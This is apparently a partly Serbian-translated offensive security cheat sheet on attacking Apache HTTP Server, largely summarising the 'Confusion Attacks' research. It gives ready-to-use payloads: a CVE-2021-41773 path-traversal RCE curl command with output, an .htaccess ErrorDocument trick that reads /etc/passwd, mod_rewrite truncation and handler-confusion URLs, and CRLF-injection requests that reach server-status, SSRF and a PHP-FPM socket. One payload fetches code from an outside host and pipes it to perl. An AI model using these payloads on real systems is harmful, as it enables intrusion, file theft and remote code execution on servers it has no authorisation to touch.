Apache

Reading time: 12 minutes

Izvršne PHP ekstenzije

Proverite koje PHP ekstenzije izvršava Apache server. Da biste ih pronašli, možete izvršiti:

grep -R -B1 "httpd-php" /etc/apache2

Takođe, neka mesta gde možete pronaći ovu konfiguraciju su:

/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf

CVE-2021-41773

curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux

LFI putem .htaccess ErrorDocument file provider (ap_expr)

Ako možete kontrolisati direktorijumov .htaccess i AllowOverride uključuje FileInfo za taj put, možete pretvoriti 404 odgovore u proizvoljna lokalna čitanja fajlova koristeći ap_expr file() function unutar ErrorDocument.

• Zahtevi:
• Apache 2.4 sa omogućenim parserom izraza (ap_expr) (podrazumevano u 2.4).
• vhost/dir mora dozvoliti .htaccess da postavi ErrorDocument (AllowOverride FileInfo).
• Apache worker user mora imati dozvole za čitanje na ciljnom fajlu.

.htaccess payload:

# Optional marker header just to identify your tenant/request path
Header always set X-Debug-Tenant "demo"
# On any 404 under this directory, return the contents of an absolute filesystem path
ErrorDocument 404 %{file:/etc/passwd}

Pokrenite tako što ćete zatražiti bilo koju nepostojeću putanju ispod tog direktorijuma, na primer pri zloupotrebi userdir-style hosting:

curl -s http://target/~user/does-not-exist | sed -n '1,20p'

Napomene i saveti:

• Samo apsolutne putanje rade. Sadržaj se vraća kao response body za 404 handler.
• Efektivna prava za čitanje su ona korisnika Apache (tipično www-data/apache). Nećete čitati /root/* ili /etc/shadow u podrazumevanim podešavanjima.
• Čak i ako .htaccess pripada root-u, ako je roditeljski direktorijum u vlasništvu tenanta i dozvoljava preimenovanje, možda ćete moći da preimenujete originalni .htaccess i otpremite svoju zamenu putem SFTP/FTP:
• rename .htaccess .htaccess.bk
• put your malicious .htaccess
• Iskoristite ovo za čitanje izvornog koda aplikacije ispod DocumentRoot ili vhost config putanja kako biste prikupili tajne (DB creds, API keys, etc.).

Confusion Attack

These types of attacks has been introduced and documented by Orange in this blog post and the following is a summary. The "confusion" attack basically abuses how the tens of modules that work together creating a Apache don't work perfectly synchronised and making some of them modify some unexpected data can cause a vulnerability in a later module.

Filename Confusion

Truncation

The mod_rewrite will trim the content of r->filename after the character ? (modules/mappers/mod_rewrite.c#L4141). To nije potpuno pogrešno jer većina modula tretira r->filename kao URL. Ali u drugim slučajevima to će biti tretirano kao putanja do fajla, što može izazvati problem.

• Path Truncation

Moguće je zloupotrebiti mod_rewrite kao u sledećem primeru pravila da se pristupi drugim fajlovima unutar fajl sistema, uklanjanjem poslednjeg dela očekivane putanje jednostavnim dodavanjem ?:

RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"

# Expected
curl http://server/user/orange
# the output of file `/var/user/orange/profile.yml`

# Attack
curl http://server/user/orange%2Fsecret.yml%3F
# the output of file `/var/user/orange/secret.yml`

• Zavaravajuća dodela RewriteFlag

U sledećem rewrite rule-u, sve dok URL završava sa .php biće tretiran i izvršen kao php. Stoga je moguće poslati URL koji se završava sa .php nakon ? karaktera dok se u putanji učitava drugačiji tip fajla (npr. slika) sa malicioznim php kodom unutar njega:

RewriteEngine On
RewriteRule  ^(.+\.php)$  $1  [H=application/x-httpd-php]

# Attacker uploads a gif file with some php code
curl http://server/upload/1.gif
# GIF89a <?=`id`;>

# Make the server execute the php code
curl http://server/upload/1.gif%3fooo.php
# GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)

ACL Bypass

Moguće je pristupiti fajlovima kojima korisnik ne bi smeo da pristupi, čak i када konfiguracija treba da onemogući pristup, sa podešavanjima kao što su:

<Files "admin.php">
AuthType Basic
AuthName "Admin Panel"
AuthUserFile "/etc/apache2/.htpasswd"
Require valid-user
</Files>

Ovo je zato što će po defaultu PHP-FPM primati URL-ove koji se završavaju na .php, kao što je http://server/admin.php%3Fooo.php, i pošto PHP-FPM uklanja sve posle karaktera ?, prethodni URL će omogućiti učitavanje /admin.php čak i ako je prethodno pravilo to zabranilo.

Confuzija oko DocumentRoot-a

DocumentRoot /var/www/html
RewriteRule  ^/html/(.*)$   /$1.html

Zanimljiva činjenica o Apacheu je da prethodni rewrite pokušava da pristupi fajlu i iz documentRoot i iz root-a. Dakle, zahtev ka https://server/abouth.html će proveriti fajl u /var/www/html/about.html i /about.html u fajl sistemu. Što u suštini može biti zloupotrebljeno za pristup fajlovima u fajl sistemu.

Otkrivanje serverskog izvornog koda

• Otkrivanje CGI izvornog koda

Dovoljno je dodati %3F na kraj da bi došlo do leak-a izvornog koda cgi modula:

curl http://server/cgi-bin/download.cgi
# the processed result from download.cgi
curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
# #!/usr/bin/perl
# use CGI;
# ...
# # the source code of download.cgi

• Otkrivanje PHP izvornog koda

Ako server ima više domena, pri čemu je jedna od njih statična domena, to se može zloupotrebiti za pretraživanje fajl sistema i leak PHP code:

# Leak the config.php file of the www.local domain from the static.local domain
curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
# the source code of config.php

Local Gadgets Manipulation

Glavni problem prethodnog napada je što će, po defaultu, pristup većini delova fajl sistema biti odbijen, kao u Apache HTTP Server’s configuration template:

<Directory />
AllowOverride None
Require all denied
</Directory>

Međutim, Debian/Ubuntu operativni sistemi podrazumevano dozvoljavaju /usr/share:

<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>

Therefore, it would be possible to abuse files located inside /usr/share in these distributions.

Local Gadget to Information Disclosure

• Apache HTTP Server with websocketd may expose the dump-env.php script at /usr/share/doc/websocketd/examples/php/, which can leak sensitive environment variables.
• Servers with Nginx or Jetty might expose sensitive web application information (e.g., web.xml) through their default web roots placed under /usr/share:
• /usr/share/nginx/html/
• /usr/share/jetty9/etc/
• /usr/share/jetty9/webapps/

Local Gadget to XSS

• On Ubuntu Desktop with LibreOffice installed, exploiting the help files' language switch feature can lead to Cross-Site Scripting (XSS). Manipulating the URL at /usr/share/libreoffice/help/help.html can redirect to malicious pages or older versions through unsafe RewriteRule.

Local Gadget to LFI

• If PHP or certain front-end packages like JpGraph or jQuery-jFeed are installed, their files can be exploited to read sensitive files like /etc/passwd:
• /usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
• /usr/share/javascript/jquery-jfeed/proxy.php
• /usr/share/moodle/mod/assignment/type/wims/getcsv.php

Local Gadget to SSRF

• Utilizing MagpieRSS's magpie_debug.php at /usr/share/php/magpierss/scripts/magpie_debug.php, an SSRF vulnerability can be easily created, providing a gateway to further exploits.

Local Gadget to RCE

• Opportunities for Remote Code Execution (RCE) are vast, with vulnerable installations like an outdated PHPUnit or phpLiteAdmin. These can be exploited to execute arbitrary code, showcasing the extensive potential of local gadgets manipulation.

Jailbreak from Local Gadgets

It's also possible to jailbreak from the allowed folders by following symlinks generated by installed software in those folders, like:

• Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/
• Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data
• Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/
• MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/
• SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/

Moreover, abusing symlinks it was possible to obtain RCE in Redmine.

Handler Confusion

This attack exploits the overlap in functionality between the AddHandler and AddType directives, which both can be used to enable PHP processing. Originally, these directives affected different fields (r->handler and r->content_type respectively) in the server's internal structure. However, due to legacy code, Apache handles these directives interchangeably under certain conditions, converting r->content_type into r->handler if the former is set and the latter is not.

Moreover, in the Apache HTTP Server (server/config.c#L420), if r->handler is empty before executing ap_run_handler(), the server uses r->content_type as the handler, effectively making AddType and AddHandler identical in effect.

Overwrite Handler to Disclose PHP Source Code

In this talk, was presented a vulnerability where an incorrect Content-Length sent by a client can cause Apache to mistakenly return the PHP source code. This was because an error handling issue with ModSecurity and the Apache Portable Runtime (APR), where a double response leads to overwriting r->content_type to text/html.
Because ModSecurity doesn't properly handle return values, it would return the PHP code and won't interpret it.

Overwrite Handler to XXXX

TODO: Orange hasn't disclose this vulnerability yet

Invoke Arbitrary Handlers

If an attacker is able to control the Content-Type header in a server response he is going to be able to invoke arbitrary module handlers. However, by the point the attacker controls this, most of the process of the request will be done. However, it's possible to restart the request process abusing the Location header because if the returned Status is 200 and the Location header starts with a /, the response is treated as a Server-Side Redirection and should be processed

According to RFC 3875 (specification about CGI) in Section 6.2.2 defines a Local Redirect Response behavior:

The CGI script can return a URI path and query-string (‘local-pathquery’) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.

Therefore, to perform this attack is needed one of the following vulns:

• CRLF Injection in the CGI response headers
• SSRF with complete control of the response headers

Arbitrary Handler to Information Disclosure

For example /server-status should only be accessible locally:

<Location /server-status>
SetHandler server-status
Require local
</Location>

Moguće je pristupiti tome postavljanjem Content-Type na server-status i Location zaglavlja koje počinje sa /.

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a

Od proizvoljnog handlera do potpune SSRF

Preusmeravanje na mod_proxy da se pristupi bilo kom protokolu na bilo kom URL-u:

http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:
http://example.com/%3F
%0d%0a
%0d%0a

Međutim, zaglavlje X-Forwarded-For se dodaje, što onemogućava pristup krajnjim tačkama metapodataka u oblaku.

Proizvoljni handler za pristup lokalnom Unix Domain Socket-u

Pristupite lokalnom Unix Domain Socket-u PHP-FPM-a da biste izvršili PHP backdoor koji se nalazi u /tmp/:

http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a

Arbitrary Handler do RCE

Zvanična PHP Docker slika uključuje PEAR (Pearcmd.php), alat za upravljanje PHP paketima iz komandne linije, koji se može zloupotrebiti za dobijanje RCE:

http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}
orange.tw/x|perl
) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

Pogledajte Docker PHP LFI Summary, autora Phith0n, za detalje ove tehnike.

References

• https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1
• Apache 2.4 Custom Error Responses (ErrorDocument)
• Apache 2.4 Expressions and functions (file:)
• HTB Zero write-up: .htaccess ErrorDocument LFI and cron pgrep abuse